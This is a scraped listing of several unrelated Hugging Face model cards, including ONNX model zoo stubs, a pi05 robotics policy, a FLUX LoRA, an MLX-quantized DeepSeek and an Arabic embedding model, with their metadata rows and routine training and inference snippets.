⚠️ **Important**: For optimal training speed, keep VSCode minimized and the training monitor open in your browser. This can improve iteration speed by **3-5x** due to how the Windows/WSL graphics stack handles window focus and CUDA kernel execution.
#### Monitor Features:
The training monitor provides three main views:
##### 1. Overview Tab:

- **Training Progress**: Real-time metrics including epoch, batch, speed, and time estimates
- **Loss Chart**: Training and validation loss visualization
- **F1 Scores**: Initial and refined F1 metrics for both training and validation
##### 2. Predictions Tab:

- **Image Preview**: Shows the current sample being analyzed
- **Prediction Controls**: Toggle between initial and refined predictions
- **Tag Analysis**:
- Color-coded tag results (correct, incorrect, missing)
- Confidence visualization with probability bars
- Category-based organization
- Filtering options for error analysis
##### 3. Selection Analysis Tab:

- **Selection Metrics**: Statistics on tag selection quality
- Ground truth recall
- Average probability for ground truth vs. non-ground truth tags
- Unique tags selected
- **Selection Graph**: Trends in selection quality over time
- **Selected Tags Details**: Detailed view of model-selected tags with confidence scores
The monitor provides invaluable insights into how the two-stage prediction model is performing, particularly how the tag selection process is working between the initial and refined prediction stages.
### Training Notes:
- Training notebooks may require WSL and 32GB+ of RAM to handle the dataset
- With more computational resources, the model could be trained longer on the full dataset
## 🙏 Acknowledgments
- Claude Sonnet 3.5, 4 and ChatGPT 5 Thinking for development assistance and brainstorming
- [Vision Transformer](https://arxiv.org/abs/2010.11929) for the foundational architecture
- [Danbooru](https://danbooru.donmai.us/) for the comprehensive tagged anime image dataset
- [p1atdev](https://huggingface.co/p1atdev) for the processed Danbooru 2024 dataset
- [IRFS paper](https://arxiv.org/abs/2305.08069) for Instance-Aware Repeat Factor Sampling methodology
- PyTorch team for optimized attention implementations and gradient checkpointing
- The open-source ML community for foundational tools and methods
|
onnxmodelzoo/resnetv2_152x2_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:37:00Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:35:26Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
Emil7018/classifier-chapter4
|
Emil7018
| 2025-09-23T14:36:54Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:google-bert/bert-base-uncased",
"base_model:finetune:google-bert/bert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-22T16:35:54Z |
---
library_name: transformers
license: apache-2.0
base_model: bert-base-uncased
tags:
- generated_from_trainer
model-index:
- name: classifier-chapter4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# classifier-chapter4
This model is a fine-tuned version of [bert-base-uncased](https://huggingface.co/bert-base-uncased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: AdamW (torch fused) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Framework versions
- Transformers 4.56.2
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
pepijn223/pi05_libero
|
pepijn223
| 2025-09-23T14:36:23Z | 64 | 1 | null |
[
"safetensors",
"region:us"
] | null | 2025-09-09T15:23:56Z |
# π₀.₅ (Pi05) Libero
π₀.₅ is a **Vision-Language-Action model with open-world generalization**, from Physical Intelligence. The LeRobot implementation is adapted from their open source [OpenPI](https://github.com/Physical-Intelligence/openpi) repository.
## Model Overview
π₀.₅ represents a significant evolution from π₀, developed by [Physical Intelligence](https://www.physicalintelligence.company/blog/pi05) to address a big challenge in robotics: **open-world generalization**. While robots can perform impressive tasks in controlled environments, π₀.₅ is designed to generalize to entirely new environments and situations that were never seen during training.
### The Generalization Challenge
As Physical Intelligence explains, the fundamental challenge isn't performing tasks that demand agility or dexterity, but generalization: the ability to correctly perform tasks in new settings with new objects. Consider a robot cleaning different homes: each home has different objects in different places. Generalization must occur at multiple levels:
- **Physical Level**: Understanding how to pick up a spoon (by the handle) or plate (by the edge), even with unseen objects in cluttered environments
- **Semantic Level**: Understanding task semantics, where to put clothes and shoes (laundry hamper, not on the bed), and what tools are appropriate for cleaning spills
- **Environmental Level**: Adapting to "messy" real-world environments like homes, grocery stores, offices, and hospitals
### Co-Training on Heterogeneous Data
The breakthrough innovation in π₀.₅ is **co-training on heterogeneous data sources**. The model learns from:
1. **Multimodal Web Data**: Image captioning, visual question answering, object detection
2. **Verbal Instructions**: Humans coaching robots through complex tasks step-by-step
3. **Subtask Commands**: High-level semantic behavior labels (e.g., "pick up the pillow" for an unmade bed)
4. **Cross-Embodiment Robot Data**: Data from various robot platforms with different capabilities
5. **Multi-Environment Data**: Static robots deployed across many different homes
6. **Mobile Manipulation Data**: ~400 hours of mobile robot demonstrations
This diverse training mixture creates a "curriculum" that enables generalization across physical, visual, and semantic levels simultaneously.
## Training
Here's a complete training command for finetuning the base π₀.₅ model on your own dataset:
```bash
python src/lerobot/scripts/train.py \
--dataset.repo_id=your_dataset \
--policy.type=pi05 \
--output_dir=./outputs/pi05_training \
--job_name=pi05_training \
--policy.repo_id=pepijn223/pi05_libero \
--policy.pretrained_path=your_repo_id \
--policy.compile_model=true \
--policy.gradient_checkpointing=true \
--wandb.enable=true \
--policy.dtype=bfloat16 \
--steps=3000 \
--policy.scheduler_decay_steps=3000 \
--policy.device=cuda \
--batch_size=32
```
## Conversion Details
This model was converted from JAX to PyTorch using the OpenPI conversion script:
```bash
python examples/convert_jax_model_to_pytorch.py \
--checkpoint_dir /pi05_libero \
--config_name pi05_libero \
--output_path /pi05_base/pytorch/fp32/ \
--precision float32
```
## Citation
If you use this model, please cite the original OpenPI work:
```bibtex
@article{openpi2024,
title={Open-World Robotic Manipulation with Vision-Language-Action Models},
author={Physical Intelligence},
year={2024},
url={https://github.com/Physical-Intelligence/openpi}
}
```
## Original Repository
[OpenPI GitHub Repository](https://github.com/Physical-Intelligence/openpi)
## License
This model follows the same license as the original OpenPI repository.
|
BarelyFunctionalCode/Qwen3-4B-unsloth-bnb-4bit-lora
|
BarelyFunctionalCode
| 2025-09-23T14:33:30Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T14:30:14Z |
---
base_model: unsloth/qwen3-4b-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** BarelyFunctionalCode
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-unsloth-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
StrategyAI/strategy-mosaic-krea
|
StrategyAI
| 2025-09-23T14:32:57Z | 0 | 0 |
diffusers
|
[
"diffusers",
"text-to-image",
"lora",
"template:diffusion-lora",
"base_model:black-forest-labs/FLUX.1-Krea-dev",
"base_model:adapter:black-forest-labs/FLUX.1-Krea-dev",
"region:us"
] |
text-to-image
| 2025-09-23T14:29:38Z |
---
tags:
- text-to-image
- lora
- diffusers
- template:diffusion-lora
widget:
- output:
url: images/mosaic-krea-1.jpg
text: 'A radiant orange fruit dissolves softly into floating shards of light and fragments of digital code. Seeds become tiny luminous orbs, drifting gracefully like satellites across a cosmic dreamscape. The background blends deep space with painterly nebula clouds glowing grids fading into mist.'
- output:
url: images/mosaic-krea-2.jpg
text: 'The subway hums with life as it rushes through the city, its windows glowing with reflections of neon signs and passing lights. Inside the train is crowded with passengers some leaning wearily against poles, others lost in the blur of their own thoughts while outside the glass, streaks of orange from streetlamps and city towers smear across the wet night. The motion of the train carries the same restless energy as the streets above echoing with the rhythm of wheels on steel and the subtle sway of bodies moving together capturing the architecture movement and pulse of an urban night that never truly rests.'
- output:
url: images/mosaic-krea-3.jpg
text: 'The harbor at sunset golden orange glow flooding the water. Boats drift and cut across the harbor their wakes catching the light in blurred shimmering trails. The skyline rises behind in layered silhouettes glass towers reflecting the fire of the setting sun, glowing with depth and contrast. Along the waterfront figures walk in soft motion blur their outlines glowing against the orange haze. Reflections ripple across wet pavement and waves balancing stillness and motion the whole scene brooding beautiful an urban symphony of architecture water and light bound together in the fading day.'
- output:
url: images/mosaic-krea-4.jpg
text: 'The runway hums with restless energy stretching into the night in sharp endless lines of glowing amber and white, bursting. A plane waits at its edge engines roaring heat rippling in waves that bend and blur the lights around it. Up close its windows glow like a string of orange lanterns flickering with reflections of the terminal and the restless city beyond. Shadows crawl across its polished body as service vehicles streak past in smears of color stitching motion into the frame. The tarmac gleams under the floodlamps every reflection trembling as if the ground itself were alive with anticipation. Behind the terminal glows in layered grids of orange light glass walls pulsing with digital signs and the blurred rhythm of movement within. Then the aircraft surges forward its fuselage slicing through the glow headlights bursting into brilliance windows streaking into a blur of fire and shadow. The frame erupts with balance steel light and motion colliding in a cinematic rush brooding and alive city.'
- output:
url: images/mosaic-krea-5.jpg
text: 'The harbout deep color and rich contrast. Boats glide across dark water their lights smearing into glowing streaks like motion blur. In the background a dense skyline rises towers lit with neon and amber windows their reflections trembling across the waves. Along the waterfront promenade silhouettes of people move in blurred motion walking beneath glowing streetlamps that cast orange halos on wet pavement. The scene is brooding yet balanced, filled with depth and energy architecture water and human movement merging into a restless rhythm echoing the pulse of a city that never sleeps.'
- output:
url: images/mosaic-krea-6.jpg
text: 'A narrow street corner glows with the warmth of an orange-lit bookstore. The glass windows fog slightly from the warmth inside, where shelves of old books lean together. Outside, the rain paints shimmering amber reflections on cobblestone.'
base_model: black-forest-labs/FLUX.1-Krea-dev
instance_prompt: MosaicPainterKrea
---
# strategy-mosaic-krea
<Gallery />
## Model description
strategy-mosaic-krea is a FLUX.1-Krea-dev LoRA based on Strategy Mosaic imagery.
## Try the model
You can try the model on our [Discord Server](https://discord.gg/NJNSwWHeF7)
## Trigger words
You should use `MosaicPainterKrea` to trigger the image generation.
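A minimal inference sketch with diffusers is shown below (assuming the standard `FluxPipeline` API and that the LoRA weights in this repository load directly; adjust dtype, step count, and device to your hardware):
```python
import torch
from diffusers import FluxPipeline

# Load the base FLUX.1-Krea-dev pipeline and apply this LoRA
pipe = FluxPipeline.from_pretrained(
    "black-forest-labs/FLUX.1-Krea-dev", torch_dtype=torch.bfloat16
).to("cuda")
pipe.load_lora_weights("StrategyAI/strategy-mosaic-krea")

# The trigger word activates the Mosaic style
prompt = "MosaicPainterKrea, a harbor at sunset, golden orange glow flooding the water"
image = pipe(prompt, num_inference_steps=28, guidance_scale=3.5).images[0]
image.save("mosaic.png")
```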
## Download model
[Download](/StrategyAI/strategy-mosaic-krea/tree/main) them in the Files & versions tab.
## License
This model falls under the [FLUX.1 [dev] Non-Commercial License](https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md).
|
onnxmodelzoo/resnetv2_152x2_bit_teacher_384_Opset17
|
onnxmodelzoo
| 2025-09-23T14:32:07Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:30:26Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bit_teacher_384_Opset17.onnx
tags:
- Computer_Vision
---
|
fredyt929/blockassist
|
fredyt929
| 2025-09-23T14:31:31Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"territorial skilled ram",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-23T11:00:33Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- territorial skilled ram
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
onnxmodelzoo/resnetv2_101x1_bitm_Opset17
|
onnxmodelzoo
| 2025-09-23T14:28:52Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:35Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101x1_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:28:34Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:13Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101x1_bitm_in21k_Opset16
|
onnxmodelzoo
| 2025-09-23T14:27:46Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:27:19Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_in21k_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101_Opset18
|
onnxmodelzoo
| 2025-09-23T14:27:18Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:27:07Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetrs420_Opset17
|
onnxmodelzoo
| 2025-09-23T14:26:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:25:45Z |
---
language: en
license: apache-2.0
model_name: resnetrs420_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetrs350_Opset17
|
onnxmodelzoo
| 2025-09-23T14:25:06Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:24:35Z |
---
language: en
license: apache-2.0
model_name: resnetrs350_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetrs350_Opset16
|
onnxmodelzoo
| 2025-09-23T14:24:35Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:24:01Z |
---
language: en
license: apache-2.0
model_name: resnetrs350_Opset16.onnx
tags:
- Computer_Vision
---
|
mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit
|
mrtoots
| 2025-09-23T14:24:30Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"deepseek_v3",
"text-generation",
"mlx",
"conversational",
"custom_code",
"base_model:unsloth/DeepSeek-V3.1-Terminus",
"base_model:quantized:unsloth/DeepSeek-V3.1-Terminus",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"3-bit",
"region:us"
] |
text-generation
| 2025-09-23T12:09:30Z |
---
license: mit
library_name: transformers
base_model: unsloth/DeepSeek-V3.1-Terminus
tags:
- mlx
---
# mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit
The Model [mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit](https://huggingface.co/mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit) was converted to MLX format from [unsloth/DeepSeek-V3.1-Terminus](https://huggingface.co/unsloth/DeepSeek-V3.1-Terminus) using mlx-lm version **0.26.4**.
## Toots' Note:
This model was converted and quantized utilizing unsloth's version of DeepSeek-V3.1-Terminus.
Please follow and support [unsloth's work](https://huggingface.co/unsloth) if you like it!
🦛 <span style="color:#800080">If you want a free consulting session, </span>[fill out this form](https://forms.gle/xM9gw1urhypC4bWS6) <span style="color:#800080">to get in touch!</span> 🤗
## Use with mlx
```bash
pip install mlx-lm
```
```python
from mlx_lm import load, generate
model, tokenizer = load("mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit")
prompt="hello"
if hasattr(tokenizer, "apply_chat_template") and tokenizer.chat_template is not None:
messages = [{"role": "user", "content": prompt}]
prompt = tokenizer.apply_chat_template(
messages, tokenize=False, add_generation_prompt=True
)
response = generate(model, tokenizer, prompt=prompt, verbose=True)
```
|
onnxmodelzoo/resnetrs270_Opset17
|
onnxmodelzoo
| 2025-09-23T14:24:00Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:23:34Z |
---
language: en
license: apache-2.0
model_name: resnetrs270_Opset17.onnx
tags:
- Computer_Vision
---
|
johngreendr1/a4b976ed-2935-4a42-b78e-93ecd19c782e
|
johngreendr1
| 2025-09-23T14:23:41Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:tiiuae/falcon-7b",
"base_model:adapter:tiiuae/falcon-7b",
"region:us"
] | null | 2025-09-23T14:22:19Z |
---
base_model: tiiuae/falcon-7b
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.1
|
onnxmodelzoo/resnetrs200_Opset16
|
onnxmodelzoo
| 2025-09-23T14:22:46Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:22:22Z |
---
language: en
license: apache-2.0
model_name: resnetrs200_Opset16.onnx
tags:
- Computer_Vision
---
|
Stef7177/camembert-triathlon-coach-v2
|
Stef7177
| 2025-09-23T12:31:34Z | 17 | 0 |
transformers
|
[
"transformers",
"safetensors",
"camembert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-22T15:28:06Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Psix1990/Pro
|
Psix1990
| 2025-09-23T12:30:54Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T12:30:54Z |
---
license: apache-2.0
---
|
asteroid999/blockassist
|
asteroid999
| 2025-09-23T12:30:16Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"furry smooth caterpillar",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-16T23:28:49Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- furry smooth caterpillar
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
markmywords-au/document_parser_grpo_v1
|
markmywords-au
| 2025-09-23T12:29:33Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2_5_vl",
"image-to-text",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"base_model:markmywords-au/document_parser_v1",
"base_model:finetune:markmywords-au/document_parser_v1",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
image-to-text
| 2025-09-23T10:16:17Z |
---
base_model: markmywords-au/document_parser_v1
library_name: transformers
model_name: document_parser_grpo_v1
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for document_parser_grpo_v1
This model is a fine-tuned version of [markmywords-au/document_parser_v1](https://huggingface.co/markmywords-au/document_parser_v1).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="markmywords-au/document_parser_grpo_v1", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite GRPO as:
```bibtex
@article{shao2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
yasserrmd/arabic-gemma-300m-emb
|
yasserrmd
| 2025-09-23T12:28:59Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"gemma3_text",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:50000",
"loss:MultipleNegativesRankingLoss",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:google/embeddinggemma-300m",
"base_model:finetune:google/embeddinggemma-300m",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T12:28:17Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:50000
- loss:MultipleNegativesRankingLoss
base_model: google/embeddinggemma-300m
widget:
- source_sentence: ما هي معاير التنظيف المتبعة حاليًا في ليمونز آند صن أبارتمنت؟
sentences:
- 'تؤكّد هذه المنشأة استخدام المطهّرات لتنظيف المنشأة وذلك بالإضافة إلى تزويد النزلاء
بمعقّم ليدين و ارتداء معدّات الحماية الشخصية من قِبَل طاقم العمل يُرجى الملاحظة
تمّ تزويدنا بهذه المعلومات من قِبَل شركائنا '
- 'دعنا نشير إلى زاوية الميل من أعلى سارية العلم إلى أسفل التل بالرمز x. سوف نستخدم
دالة الظل لحل هذه المشكلة.أولًا، دعونا نوجد ارتفاع التل عند قاعدة سارية العلم.
يمكننا استخدام دالة الظل لزاوية الانخفاض:ظا (25 درجة) = ارتفاع التل / 100 مترارتفاع
التل = 100 * ظا(25°) ≈ 46.63 مترالآن، دعونا نفكر في المثلث الذي يتكون من قمة سارية
العلم، وأسفل سارية العلم، وأسفل التل. ارتفاع هذا المثلث هو مجموع ارتفاع سارية
العلم وارتفاع التل:الارتفاع الإجمالي = ارتفاع سارية العلم + ارتفاع التل
